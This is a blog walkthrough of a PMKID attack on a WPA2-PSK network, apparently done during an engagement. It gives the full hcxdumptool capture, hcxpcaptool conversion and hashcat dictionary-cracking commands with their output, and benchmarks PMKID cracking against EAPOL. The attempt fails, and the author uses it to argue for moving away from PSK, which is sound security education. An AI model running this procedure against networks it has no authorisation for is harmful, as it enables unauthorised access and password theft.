PMKID Attack Using Hcxdumptool and Hashcat

While it’s a bit older, I recently pulled off a PMKID attack and wanted to share the steps.

PMKID Attack – Introduction

If you’ve never heard of the PMKID attack, then I recommend reading the original hashcat post.

This is a client-less attack that doesn’t need a 4-way handshake or special output format.

For another walkthrough, you can also visit the following post.

Get Your NordVPN Offer Now!

YouTube Version of this Post

If you prefer a video over reading the text, then you can find the YouTube version of this post below.

That said, don’t forget to hit those like and subscribe buttons to help support the blog and channel!

Targeting the Network

First, you will need to use hcxdumptool to capture the WLAN traffic. Note that not all drivers are working out of the box, but the following is a list of recommended chipsets.

• USB ID 148f:7601 Ralink Technology, Corp. MT7601U Wireless Adapter
• USB ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter
• USB ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter
• USB ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter
• USB ID 0bda:8189 Realtek Semiconductor Corp. RTL8187B Wireless 802.11g 54Mbps Network Adapter

Note that I performed this attack with a different card, but you will need to do some additional setup.

root@kali:~# lsusb
Bus 004 Device 003: ID 0bda:8812 Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac 2T2R DB WLAN Adapter

With my Alfa card in monitor mode, I was ready to begin.

root@kali:~# iwconfig
wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.437 GHz  Tx-Power=30 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Power Management:off
          
lo        no wireless extensions.

eth0      no wireless extensions.

First, I used airodump to grab the BSSID of my target network.

 CH  6 ][ Elapsed: 48 s ][ 2019-02-26 13:00                                         
                                                                                                          
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                       
                                                                                                          
 18:31:xx:xx:xx:xx  -67  17      266        0    0   6  130  WPA2 CCMP   PSK  TARGETNETWORK   

Once I obtained the BSSID, I added it to a filter file. While more than one BSSID can exist in this file, I was only targeting this specific network.

root@kali:~# echo "18xxxxxxxxxx" > myfilter.txt

Get Your NordVPN Offer Now!

Performing the Attack

With my filter in place, I could now use hcxdumptool to collect packets.

I was able to capture a PMKID hash very quickly, which was awesome!

root@kali:~# hcxdumptool -o capture.pcap -i wlan0 --enable_status=1 --filterlist=myfilter.txt --filtermode=2
initialization...

start capturing (stop with ctrl+c)
INTERFACE:...............: wlan0
ERRORMAX.................: 100 errors
FILTERLIST...............: 1 entries
MAC CLIENT...............: dc701431xxxx
MAC ACCESS POINT.........: 48f317b472b8 (incremented on every new client)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 65198
ANONCE...................: 7281156220ed9e68c9f974df2f98d10b7c800270b49e1004ad5dc1ad3e2662b0

[13:07:58 - 006] 1831xxxxxxxx -> a04ea7a4xxxx [FOUND PMKID]

Next, I used hcxpcaptool to convert the hash into a usable format.

root@kali:~# hcxpcaptool -z pmkid_hash.txt capture.pcap 

reading from capture.pcap
                                                
summary:                                        
--------
file name....................: capture.pcap
file type....................: pcapng 1.0
file hardware information....: i686
file os information..........: Linux 4.19.0-kali1-686-pae
file application information.: hcxdumptool 5.1.3
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 88
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 88
beacons (with ESSID inside)..: 9
probe requests...............: 14
probe responses..............: 11
association requests.........: 7
association responses........: 7
authentications (OPEN SYSTEM): 38
authentications (BROADCOM)...: 22
authentications (APPLE)......: 4
EAPOL packets................: 1
EAPOL PMKIDs.................: 1

1 PMKID(s) written to pmkid_hash.txt

Cracking the Hash

To crack these hashes using hashcat, you will need at least version 4.2.0.

Rays-MacBook-Pro-2:Wireless doyler$ hashcat --version
v4.2.1

After verifying that I had an updated version, I started to crack the hash.

Rays-MacBook-Pro-2:Wireless doyler$ hashcat -d2,3 -m 16800 -r ~/tools/cracking/best64.rule pmkid_hash.txt ~/tools/cracking/rockyou.txt
hashcat (v4.2.1) starting...

OpenCL Platform #1: Apple
=========================
* Device #1: Intel(R) Core(TM) i7-6920HQ CPU @ 2.90GHz, skipped.
* Device #2: Intel(R) HD Graphics 530, 384/1536 MB allocatable, 24MCU
* Device #3: AMD Radeon Pro 460 Compute Engine, 1024/4096 MB allocatable, 16MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 77

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Watchdog: Temperature abort trigger disabled.

Dictionary cache built:
* Filename..: /Users/doyler/tools/cracking/rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 1104517568
* Runtime...: 1 sec

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s

Session..........: hashcat
Status...........: Running
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: f4fxxxxxxxxxxxxxxxxxxxxxxxxxxxxx*1831xxxxxxxx*axxxx...6xxxxx
Time.Started.....: Tue Feb 26 14:17:20 2019 (28 secs)
Time.Estimated...: Tue Feb 26 18:57:06 2019 (4 hours, 39 mins)
Guess.Base.......: File (/Users/doyler/tools/cracking/rockyou.txt)
Guess.Mod........: Rules (/Users/doyler/tools/cracking/best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#2.....:     5477 H/s (7.38ms) @ Accel:8 Loops:4 Thr:256 Vec:1
Speed.Dev.#3.....:    59229 H/s (8.04ms) @ Accel:32 Loops:16 Thr:256 Vec:1
Speed.Dev.#*.....:    64706 H/s
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 20165670/1104517568 (1.83%)
Rejected.........: 18445350/20165670 (91.47%)
Restore.Point....: 0/14344384 (0.00%)
Candidates.#2....: 123456789 -> Iloveyou85
Candidates.#3....: iloveyou348 -> footiecrazy8

Unfortunately, I was unable to crack the hash in this specific scenario. That said, I was able to prove the vulnerability and convince them to switch away from PSK.

In light of a fun screenshot of me able to connect, I give you a picture of my co-worker’s awesome Tupavco TP511 WiFi Panel antenna

I also wanted to point out that cracking the PMKID hashes is around twice as fast as standard EAPOL packets! This makes the attack even more enticing, as WPA2 is a notoriously slow algorithm.

Rays-MacBook-Pro-2:Wireless doyler$ hashcat -d2,3 -m 16800 -b
hashcat (v4.2.1) starting in benchmark mode...

Benchmarking uses hand-optimized kernel code by default.
You can use it in your cracking session by setting the -O option.
Note: Using optimized kernel code limits the maximum supported password length.
To disable the optimized kernel code in benchmark mode, use the -w option.

OpenCL Platform #1: Apple
=========================
* Device #1: Intel(R) Core(TM) i7-6920HQ CPU @ 2.90GHz, skipped.
* Device #2: Intel(R) HD Graphics 530, 384/1536 MB allocatable, 24MCU
* Device #3: AMD Radeon Pro 460 Compute Engine, 1024/4096 MB allocatable, 16MCU

Benchmark relevant options:
===========================
* --opencl-devices=2,3
* --optimized-kernel-enable

Hashmode: 16800 - WPA-PMKID-PBKDF2 (Iterations: 4096)

Speed.Dev.#2.....:     6631 H/s (53.86ms) @ Accel:32 Loops:8 Thr:256 Vec:1
Speed.Dev.#3.....:    59876 H/s (66.06ms) @ Accel:128 Loops:32 Thr:256 Vec:1
Speed.Dev.#*.....:    66507 H/s

Started: Thu Feb 28 16:05:21 2019
Stopped: Thu Feb 28 16:05:31 2019
Rays-MacBook-Pro-2:Wireless doyler$ hashcat -d2,3 -m 2500 -b
hashcat (v4.2.1) starting in benchmark mode...

Benchmarking uses hand-optimized kernel code by default.
You can use it in your cracking session by setting the -O option.
Note: Using optimized kernel code limits the maximum supported password length.
To disable the optimized kernel code in benchmark mode, use the -w option.

OpenCL Platform #1: Apple
=========================
* Device #1: Intel(R) Core(TM) i7-6920HQ CPU @ 2.90GHz, skipped.
* Device #2: Intel(R) HD Graphics 530, 384/1536 MB allocatable, 24MCU
* Device #3: AMD Radeon Pro 460 Compute Engine, 1024/4096 MB allocatable, 16MCU

Benchmark relevant options:
===========================
* --opencl-devices=2,3
* --optimized-kernel-enable

Hashmode: 2500 - WPA-EAPOL-PBKDF2 (Iterations: 4096)

Speed.Dev.#2.....:     6634 H/s (53.85ms) @ Accel:32 Loops:8 Thr:256 Vec:1
Speed.Dev.#3.....:    26169 H/s (75.92ms) @ Accel:64 Loops:32 Thr:256 Vec:1
Speed.Dev.#*.....:    32803 H/s

Started: Thu Feb 28 16:05:36 2019
Stopped: Thu Feb 28 16:05:44 2019

Get Your NordVPN Offer Now!

PMKID Attack – Conclusion

While I wasn’t able to perform a complete compromise, this was still an awesome attack to do. I definitely plan on using, as well as researching, it further.

Note that EAPHammer can also do this attack, and I may share a post with that technique as well.

If you have any other suggestions for wireless gear or techniques that I should try, then please reach out!